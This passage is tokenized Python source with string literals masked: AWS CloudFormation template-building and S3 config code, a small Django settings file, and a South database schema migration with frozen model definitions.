( ) , <EOL> open ( '<STR_LIT>' ) . read ( ) ) <EOL> cft = core . CloudFormationTemplate ( description = "<STR_LIT>" ) <EOL> cft . resources . ec2_instance = core . Resource ( <EOL> '<STR_LIT>' , '<STR_LIT>' , <EOL> core . Properties ( { <EOL> '<STR_LIT>' : config [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : functions . base64 ( user_data_script ) , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : functions . ref ( '<STR_LIT>' ) , <EOL> '<STR_LIT>' : instance_tags , <EOL> } ) <EOL> ) <EOL> cft . resources . instance_profile = core . Resource ( <EOL> '<STR_LIT>' , '<STR_LIT>' , <EOL> core . Properties ( { <EOL> '<STR_LIT>' : '<STR_LIT:/>' , <EOL> '<STR_LIT>' : [ <EOL> functions . ref ( '<STR_LIT>' ) <EOL> ] <EOL> } ) <EOL> ) <EOL> cft . resources . web_role = core . Resource ( <EOL> '<STR_LIT>' , '<STR_LIT>' , <EOL> core . Properties ( { <EOL> "<STR_LIT>" : { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : [ { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : { <EOL> "<STR_LIT>" : [ "<STR_LIT>" ] <EOL> } , <EOL> "<STR_LIT>" : [ "<STR_LIT>" ] <EOL> } ] <EOL> } , <EOL> '<STR_LIT>' : [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' <EOL> ] , <EOL> '<STR_LIT>' : '<STR_LIT:/>' , <EOL> '<STR_LIT>' : [ <EOL> { <EOL> '<STR_LIT>' : "<STR_LIT>" , <EOL> '<STR_LIT>' : { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : [ <EOL> { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : [ <EOL> "<STR_LIT>" <EOL> ] , <EOL> "<STR_LIT>" : [ <EOL> "<STR_LIT:*>" <EOL> ] <EOL> } <EOL> ] <EOL> } <EOL> } , <EOL> { <EOL> '<STR_LIT>' : "<STR_LIT>" , <EOL> '<STR_LIT>' : { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : [ <EOL> { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : [ <EOL> "<STR_LIT>" <EOL> ] , <EOL> "<STR_LIT>" : "<STR_LIT:*>" <EOL> } <EOL> ] <EOL> } <EOL> } <EOL> ] <EOL> } ) <EOL> ) <EOL> cft . resources . smtp_user = core . Resource ( <EOL> '<STR_LIT>' , '<STR_LIT>' , <EOL> core . Properties ( { <EOL> '<STR_LIT>' : [ { <EOL> '<STR_LIT>' : "<STR_LIT>" , <EOL> '<STR_LIT>' : { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : [ { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT:*>" <EOL> } ] <EOL> } <EOL> } ] <EOL> } ) <EOL> ) <EOL> cft . resources . mount = core . Resource ( <EOL> '<STR_LIT>' , '<STR_LIT>' , <EOL> core . Properties ( { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : functions . ref ( '<STR_LIT>' ) , <EOL> '<STR_LIT>' : config [ '<STR_LIT>' ] <EOL> } ) <EOL> ) <EOL> print ( str ( cft ) ) <EOL> def load_config ( ) : <EOL> """<STR_LIT>""" <EOL> config_dir = "<STR_LIT>" <EOL> pattern = os . path . join ( config_dir , "<STR_LIT>" ) <EOL> config = { } <EOL> for config_filename in sorted ( glob . glob ( pattern ) ) : <EOL> with open ( config_filename ) as f : <EOL> y = yaml . load ( f ) <EOL> if y : <EOL> config . update ( y ) <EOL> required = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> bad = [ ] <EOL> for key in required : <EOL> if key not in config : <EOL> bad . append ( key ) <EOL> if bad : <EOL> sys . stderr . write ( "<STR_LIT>" . format ( <EOL> config_dir , bad ) ) <EOL> raise ConfigError ( ) <EOL> config . setdefault ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> config . setdefault ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> return config <EOL> def save_s3_config ( config , suffix ) : <EOL> """<STR_LIT>""" <EOL> s3 = boto3 . resource ( '<STR_LIT>' ) <EOL> if '<STR_LIT>' not in config : <EOL> bucket_name = '<STR_LIT>' + random_alnum ( <NUM_LIT> ) <EOL> s3 . create_bucket ( Bucket = bucket_name ) <EOL> s3_config = dict ( S3_CONFIG_BUCKET = bucket_name ) <EOL> with open ( '<STR_LIT>' , '<STR_LIT:w>' ) as o : <EOL> o . write ( "<STR_LIT>" ) <EOL> yaml . dump ( s3_config , stream = o ) <EOL> config . update ( s3_config ) <EOL> bucket_name = config [ '<STR_LIT>' ] <EOL> object_name = ( "<STR_LIT>" + suffix ) <EOL> s3_uri = "<STR_LIT>" . format ( bucket_name , object_name ) <EOL> config [ '<STR_LIT>' ] = s3_uri <EOL> s3_object = s3 . Object ( bucket_name , object_name ) <EOL> s3_object . put ( Body = json . dumps ( config , indent = <NUM_LIT:2> ) ) <EOL> return s3_uri <EOL> def random_alnum ( n ) : <EOL> """<STR_LIT>""" <EOL> import random <EOL> import string <EOL> return '<STR_LIT>' . join ( <EOL> random . choice ( string . ascii_lowercase + string . digits ) <EOL> for _ in range ( n ) ) <EOL> def derive_config ( config ) : <EOL> """<STR_LIT>""" <EOL> ec2 = boto3 . resource ( '<STR_LIT>' ) <EOL> volume = ec2 . Volume ( config [ '<STR_LIT>' ] ) <EOL> az = volume . availability_zone <EOL> if '<STR_LIT>' in config : <EOL> assert config [ '<STR_LIT>' ] == az <EOL> config [ '<STR_LIT>' ] = az <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> sys . exit ( main ( ) ) </s>
<s> from . dev import * <EOL> STATICFILES_DIRS = ( <EOL> os . path . join ( BASE_DIR , "<STR_LIT>" ) , <EOL> os . path . join ( BASE_DIR , "<STR_LIT>" ) <EOL> ) </s>
<s> import datetime <EOL> from south . db import db <EOL> from south . v2 import SchemaMigration <EOL> from django . db import models <EOL> class Migration ( SchemaMigration ) : <EOL> def forwards ( self , orm ) : <EOL> db . delete_unique ( '<STR_LIT>' , [ '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> def backwards ( self , orm ) : <EOL> db . create_unique ( '<STR_LIT>' , [ '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> models = { <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT:email>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:password>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:username>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:max_length>' : '<STR_LIT>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' , '<STR_LIT>' : "<STR_LIT>" } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:description>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:status>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:3>' } ) , <EOL> '<STR_LIT:filename>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:None>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:False>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:description>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:0>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:0>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { } ) , <EOL> '<STR_LIT:description>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' , '<STR_LIT>' : [ '<STR_LIT>' ] } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT:date>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT:message>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:version>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:1>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:description>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:type>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:description>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' 